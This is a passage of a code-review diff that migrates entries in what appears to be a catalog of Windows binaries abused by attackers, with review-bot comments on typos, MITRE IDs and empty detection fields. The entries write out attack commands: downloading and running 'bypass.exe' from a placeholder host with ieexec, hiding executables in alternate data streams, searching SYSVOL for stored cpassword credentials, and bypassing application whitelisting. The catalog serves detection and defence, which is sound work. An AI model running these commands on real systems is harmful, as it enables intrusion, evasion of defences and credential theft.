|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe | ||||
|     Description: 'Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.' | ||||
|     Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file. | ||||
|     Usecase: Extract data from cab file and hide it in an alternate data stream.  | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt | ||||
|     Description: 'Copy the source file to the destination file and overwrite it.' | ||||
|     Description: Copy the source file to the destination file and overwrite it. | ||||
|     Usecase: Download file from UNC/WEBDav | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\extrac32.exe | ||||
|   - c:\windows\sysWOW64\extrac32.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\extrac32.exe | ||||
|   - Path: C:\Windows\SysWOW64\extrac32.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC:  | ||||
| Resources: | ||||
|   - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ | ||||
|   - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
|   - https://twitter.com/egre55/status/985994639202283520 | ||||
| Notes: Thanks to Oddvar Moe - @oddvarmoe, egre55 - @egre55 | ||||
|  | ||||
|   - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ | ||||
|   - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
|   - Link: https://twitter.com/egre55/status/985994639202283520 | ||||
| Acknowledgement: | ||||
|   - Person: egre55 | ||||
|     Handle: '@egre55' | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
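Review bot: the top-level `Description:` is left empty (the old value was "Add ADS, Download") while the other rewritten files carry a one-line description of the binary; ` - IOC:` is empty as well. "unc path" should be "UNC path" to match the Usecase wording in this file, and both Usecase lines carry trailing whitespace.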
| @@ -1,23 +1,52 @@ | ||||
| --- | ||||
| Name: Findstr.exe | ||||
| Description: Add ADS, Search | ||||
| Author: '' | ||||
| Description:  | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe | ||||
|     Description: 'Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.' | ||||
|     Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. | ||||
|     Usecase: Add a file to an alternate data stream to hide from defensive counter measures | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe | ||||
|     Description: 'Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.' | ||||
|   - Command: findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml | ||||
|     Description: 'Search for stored password in Group Policy files stored on SYSVOL.' | ||||
|     Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. | ||||
|     Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: findstr /S /I cpassword \\sysvol\policies\*.xml | ||||
|     Description: Search for stored password in Group Policy files stored on SYSVOL. | ||||
|     Usecase: Find credentials stored in cpassword attrbute | ||||
|     Category: Credentials | ||||
|     Privileges: User | ||||
|     MitreID: T1081 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1081 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe | ||||
|     Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is downloaded to the target file. | ||||
|     Usecase: Download/Copy file from webdav server | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1185 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1185 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\findstr.exe | ||||
|   - c:\windows\sysWOW64\findstr.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\findstr.exe | ||||
|   - Path: C:\Windows\SysWOW64\findstr.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: finstr.exe should normally not be invoked on a client system | ||||
| Resources: | ||||
|   - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ | ||||
|   - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
| Notes: Thanks to Oddvar Moe - @oddvarmoe | ||||
|  | ||||
|   - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ | ||||
|   - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
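Review bot: the new IOC line `- IOC: finstr.exe should normally not be invoked on a client system` misspells the binary as `finstr.exe`; a detection keyed on that string would never match, so it should read `findstr.exe`. Two more points in the rewritten Commands block: the third entry (`Usecase: Download/Copy file from webdav server`) is tagged `MitreID: T1185`, while every other Download entry in this commit (Hh, Ieexec, Makecab) uses T1105, so this looks like a wrong ID rather than a deliberate choice; and `Usecase: Find credentials stored in cpassword attrbute` has a typo (`attribute`). The cpassword command also lost its server placeholders: the old line read `findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml` and the new one `\\sysvol\policies\*.xml`, which is no longer a UNC path to the SYSVOL share, so the `<FQDN>` placeholders should be restored.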
| @@ -1,22 +1,39 @@ | ||||
| --- | ||||
| Name: Forfiles.exe | ||||
| Description: Execute, Read ADS | ||||
| Author: '' | ||||
| Description: Selects and executes a command on a file or set of files. This command is useful for batch processing. | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | ||||
|     Description: 'Executes calc.exe since there is a match for notepad.exe in the c:\\windows\\System32 folder.' | ||||
|     Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder. | ||||
|     Usecase: Use forfiles to start a new process to evade defensive counter measures | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" | ||||
|     Description: 'Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\\windows\\system32 folder.' | ||||
|     Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder. | ||||
|     Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - C:\Windows\system32\forfiles.exe | ||||
|   - C:\Windows\sysWOW64\forfiles.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\forfiles.exe | ||||
|   - Path: C:\Windows\SysWOW64\forfiles.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC:  | ||||
| Resources: | ||||
|   - https://twitter.com/vector_sec/status/896049052642533376 | ||||
|   - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
|   - https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ | ||||
| Notes: Thanks to Eric - @vector_sec, Oddvar Moe - @oddvarmoe | ||||
|  | ||||
|   - Link: https://twitter.com/vector_sec/status/896049052642533376 | ||||
|   - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
|   - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ | ||||
| Acknowledgement: | ||||
|   - Person: Eric | ||||
|     Handle: '@vector_sec' | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
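Review bot: `- IOC:` under `Detection:` is left empty, so the template migration has produced a field with no content; either add an indicator (the second command above gives an obvious candidate: forfiles.exe spawning a child process whose path contains a `:` stream name) or drop the placeholder so consumers do not see a null IOC. The rewritten line `Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe ...` also carries the old typo `(AD)` forward; the abbreviation used everywhere else in these files is `(ADS)`.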
| @@ -1,22 +1,36 @@ | ||||
| --- | ||||
| Name: Gpscript.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description: Used by group policy to process scripts  | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Gpscript /logon | ||||
|     Description: 'Executes logon scripts configured in Group Policy.' | ||||
|     Description: Executes logon scripts configured in Group Policy. | ||||
|     Usecase: Add local group policy logon script to execute file and hide from defensive counter measures | ||||
|     Category: Execute | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1216 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1216 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: Gpscript /startup | ||||
|     Description: 'Executes startup scripts configured in Group Policy.' | ||||
|     Description: Executes startup scripts configured in Group Policy | ||||
|     Usecase: Add local group policy logon script to execute file and hide from defensive counter measures | ||||
|     Category: Execute | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1216 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1216 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\gpscript.exe | ||||
|   - c:\windows\sysWOW64\gpscript.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\gpscript.exe | ||||
|   - Path: C:\Windows\SysWOW64\gpscript.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: Scripts added in local group policy | ||||
|  - IOC: Execution of Gpscript.exe after logon | ||||
| Resources: | ||||
|   - https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/ | ||||
| Notes: | | ||||
|     Thanks to Oddvar Moe - @oddvarmoe | ||||
|     Requires administrative rights and modifications to local group policy settings. | ||||
|  | ||||
|   - Link: https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/ | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
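Review bot: the `Gpscript /startup` entry's `Usecase: Add local group policy logon script to execute file and hide from defensive counter measures` is a copy of the `/logon` entry and should say startup script. The migration also drops the old note `Requires administrative rights and modifications to local group policy settings.`; `Privileges: Administrator` keeps the first half, but the fact that the technique requires editing local group policy is exactly what the `Scripts added in local group policy` IOC relies on and is worth keeping in the Description. Minor: `Description: Used by group policy to process scripts ` has trailing whitespace, and the new `Description: Executes startup scripts configured in Group Policy` lost the trailing period the `/logon` line has.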
| @@ -1,23 +1,35 @@ | ||||
| --- | ||||
| Name: hh.exe | ||||
| Description: Download, Execute | ||||
| Author: '' | ||||
| Name: Hh.exe | ||||
| Description: Binary used for processing chm files in Windows | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: HH.exe http://www.google.com | ||||
|     Description: Opens google's web page with HTML Help. | ||||
|   - Command: HH.exe C:\ | ||||
|     Description: Opens c:\\ with HTML Help. | ||||
|   - Command: HH.exe c:\windows\system32\calc.exe | ||||
|     Description: 'Opens calc.exe with HTML Help.' | ||||
|   - Command: HH.exe http://some.url/script.ps1 | ||||
|     Description: Open the target PowerShell script with HTML Help. | ||||
|     Usecase: Download files from url | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: HH.exe c:\windows\system32\calc.exe | ||||
|     Description: Executes calc.exe with HTML Help. | ||||
|     Usecase: Execute process with HH.exe | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1216 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1216 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\hh.exe | ||||
|   - c:\windows\sysWOW64\hh.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\hh.exe | ||||
|   - Path: C:\Windows\SysWOW64\hh.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: hh.exe should normally not be in use on a normal workstation | ||||
| Resources: | ||||
|   - https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/ | ||||
| Notes: Thanks to Oddvar Moe - @oddvarmoe | ||||
|   - Link: https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/ | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
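Review bot: the `HH.exe c:\windows\system32\calc.exe` entry is tagged `MitreID: T1216`, but the other plain Execute entries in this commit (Forfiles, Ie4unit, Infdefaultinstall) use T1218 for the same kind of signed-binary proxy execution, and T1216 is used here for Gpscript running scripts; pick one consistently or say why hh.exe differs. Also, the new first entry pairs `Description: Open the target PowerShell script with HTML Help.` with `Usecase: Download files from url` and `Category: Download`, so the Description should state that the file is fetched from the URL, as the Ieexec entry does (`Downloads and executes ...`).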
| @@ -1,20 +1,29 @@ | ||||
| --- | ||||
| Name: Ie4unit.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description:  | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: ie4unit.exe -BaseSettings | ||||
|     Description: 'Executes commands from a specially prepared ie4uinit.inf file.' | ||||
|     Description: Executes commands from a specially prepared ie4uinit.inf file. | ||||
|     Usecase: Get code execution by copy files to another location | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - 'c:\windows\system32\ie4unit.exe    ' | ||||
|   - 'c:\windows\sysWOW64\ie4unit.exe    ' | ||||
|   - 'c:\windows\system32\ieuinit.inf    ' | ||||
|   - 'c:\windows\sysWOW64\ieuinit.inf    ' | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: c:\windows\system32\ie4unit.exe | ||||
|   - Path: c:\windows\sysWOW64\ie4unit.exe | ||||
|   - Path: c:\windows\system32\ieuinit.inf | ||||
|   - Path: c:\windows\sysWOW64\ieuinit.inf | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: ie4unit.exe loading a inf file from outside %windir% | ||||
| Resources: | ||||
|   - https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ | ||||
| Notes: Thanks to Jimmy - @bohops | ||||
|  | ||||
|   - Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ | ||||
| Acknowledgement: | ||||
|   - Person: Jimmy | ||||
|     Handle: '@bohops' | ||||
| --- | ||||
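Review bot: `Description: ` at the top of the Ie4unit.exe file is empty, so this is the only entry in the commit that gives no account of what the binary is; a one-line description like the other files have is needed before merge. The file also spells the tool three different ways: `Command: ie4unit.exe -BaseSettings` and the `Path:` lines say `ie4unit`, the description says `ie4uinit.inf`, and the `.inf` paths say `ieuinit.inf`; these should be checked against the actual file names on disk and made consistent, since the Path list is presumably what tooling will key on. Two smaller points: the new `Path:` lines keep `c:\windows\system32` in lowercase while every other file in this commit was normalized to `C:\Windows\System32`, and the IOC should read `an inf file`.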
| @@ -1,18 +1,35 @@ | ||||
| --- | ||||
| Name: IEExec.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Name: Ieexec.exe | ||||
| Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL. | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe | ||||
|     Description: 'Executes bypass.exe from the remote server.' | ||||
|   - Command:ieexec.exe http://x.x.x.x:8080/bypass.exe  | ||||
|     Description: Downloads and executes bypass.exe from the remote server. | ||||
|     Usecase: Download and run attacker code from remote location | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command:ieexec.exe http://x.x.x.x:8080/bypass.exe  | ||||
|     Description: Downloads and executes bypass.exe from the remote server. | ||||
|     Usecase: Download and run attacker code from remote location | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\ieexec.exe | ||||
|   - c:\windows\sysWOW64\ieexec.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC:  | ||||
| Resources: | ||||
|   - https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/ | ||||
| Notes: Thanks to Casey Smith - @subtee | ||||
|  | ||||
|   - Link: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/ | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
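Review bot: both new command lines read `- Command:ieexec.exe http://x.x.x.x:8080/bypass.exe ` with no space after the colon, which is not a YAML key/value pair (`Command:ieexec.exe` parses as a single plain scalar), so the indented `Description:` that follows will make the document fail to load; the old line `- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe` had it right, and both new lines also carry trailing whitespace. Separately, `- IOC: ` is empty; given that the `Path:` entries were corrected to the `Microsoft.NET\Framework\v2.0.50727` directories, ieexec.exe starting from those directories with a URL argument is a natural indicator to record.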
| @@ -1,20 +1,28 @@ | ||||
| --- | ||||
| Name: InfDefaultInstall.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Name: Infdefaultinstall.exe | ||||
| Description: Binary used to perform installation based on content inside inf files | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: InfDefaultInstall.exe Infdefaultinstall.inf | ||||
|     Description: 'Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.' | ||||
|     Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file. | ||||
|     Usecase: Code execution | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\Infdefaultinstall.exe | ||||
|   - c:\windows\sysWOW64\Infdefaultinstall.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\Infdefaultinstall.exe | ||||
|   - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe | ||||
| Code Sample:  | ||||
| - Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a | ||||
| Detection: | ||||
|  - IOC: | ||||
| Resources: | ||||
|   - https://twitter.com/KyleHanslovan/status/911997635455852544 | ||||
|   - https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a | ||||
|   - https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/ | ||||
| Notes: Thanks to Kyle Hanslovan - @kylehanslovan | ||||
|  | ||||
|   - Link: https://twitter.com/KyleHanslovan/status/911997635455852544 | ||||
|   - Link: https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/ | ||||
| Acknowledgement: | ||||
|   - Person: Kyle Hanslovan | ||||
|     Handle: '@kylehanslovan' | ||||
| --- | ||||
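Review bot: the unquoted rewrite `Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.` keeps the garbled phrase `from a command in entered into`; it should read `from a command entered into`. `- IOC:` is again left empty, and since `Code Sample:` now links the gist that used to sit under `Resources:`, the gist is reachable only through that one field, which is fine as long as the template consumer renders `Code:` values as links.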
| @@ -1,25 +1,42 @@ | ||||
| --- | ||||
| Name: InstallUtil.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Name: Installutil.exe | ||||
| Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | ||||
|     Description: 'Execute the target .NET DLL or EXE.' | ||||
|     Description: Execute the target .NET DLL or EXE. | ||||
|     Usecase: Use to execute code and bypass application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1118 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1118 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | ||||
|     Description: Execute the target .NET DLL or EXE. | ||||
|     Usecase: Use to execute code and bypass application whitelisting | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1118 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1118 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe | ||||
|   - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe | ||||
|   - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | ||||
|   - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: | ||||
| Resources: | ||||
|   - https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/ | ||||
|   - https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12 | ||||
|   - http://subt0x10.blogspot.no/2017/09/banned-file-execution-via.html | ||||
|   - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/InstallUtil.md | ||||
|   - https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/ | ||||
|   - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
| Notes: Thanks to Casey Smith - @subtee | ||||
|  | ||||
|   - Link: https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/ | ||||
|   - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12 | ||||
|   - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1118/T1118.md | ||||
|   - Link: https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/ | ||||
|   - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
|   - Link: https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
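Review bot: the Resources migration silently drops `http://subt0x10.blogspot.no/2017/09/banned-file-execution-via.html` while keeping every other old link and adding the Microsoft docs page; since Casey Smith (@subtee) is the person acknowledged for this entry and that is his write-up, the removal should either be justified (dead link, in which case a web.archive.org copy as done for Msdt would be better) or reverted. `- IOC:` is empty here too, although the command line shown (`/logfile= /LogToConsole=false /U`) is itself a usable indicator. The two entries are identical except for `Category:`, which matches the pattern used for Ieexec and Msdt, so that is consistent; `Description: The Installer tool is a command-line utility ... in specified assemblies` is missing its final period.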
| @@ -1,22 +1,44 @@ | ||||
| --- | ||||
| Name: Makecab.exe | ||||
| Description: Package, Add ADS, Download | ||||
| Author: '' | ||||
| Description: Binary to package existing files into a cabinet (.cab) file | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab | ||||
|     Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. | ||||
|   - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab | ||||
|     Description: Compresses the target file and stores it in the target file. | ||||
|     Usecase: Hide data compressed into an alternate data stream | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab | ||||
|     Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. | ||||
|     Usecase: Hide data compressed into an alternate data stream | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab | ||||
|     Description: Download and compresses the target file and stores it in the target file. | ||||
|     Usecase: Download file and compress into a cab file | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\makecab.exe | ||||
|   - c:\windows\sysWOW64\makecab.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\makecab.exe | ||||
